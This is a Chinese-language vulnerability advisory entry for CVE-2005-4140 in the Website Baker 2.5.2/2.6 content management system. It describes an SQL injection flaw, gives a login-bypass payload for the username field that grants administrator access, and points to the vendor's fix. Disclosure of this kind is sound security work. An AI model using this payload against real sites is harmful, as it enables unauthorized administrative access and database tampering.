添加时间:
2008-10-03

系统编号:
WAVDB-00890
BugCVE: CVE-2005-4140
BUGTRAQ: 15776

影响版本:
Website Baker 2.5.2/2.6

程序介绍:

Website Baker是一款基于WEB的PHP编写的内容管理程序。

漏洞分析:

Website Baker对用户提交给的参数缺少正确充分的过滤，远程攻击者可以利用此漏洞非授权操作数据库，绕过访问认证获取管理员权限。

漏洞利用:

user: 'or isnull(1/0)/*
pass: [whatever]

解决方案:
厂商补丁：
Website Baker
-------------
目前厂商已经在最新版本的软件中修补了这个安全问题，请到厂商的主页下载：
http://www.websitebaker.org/

信息来源:
<*来源：rgod （rgod@autistici.org）*>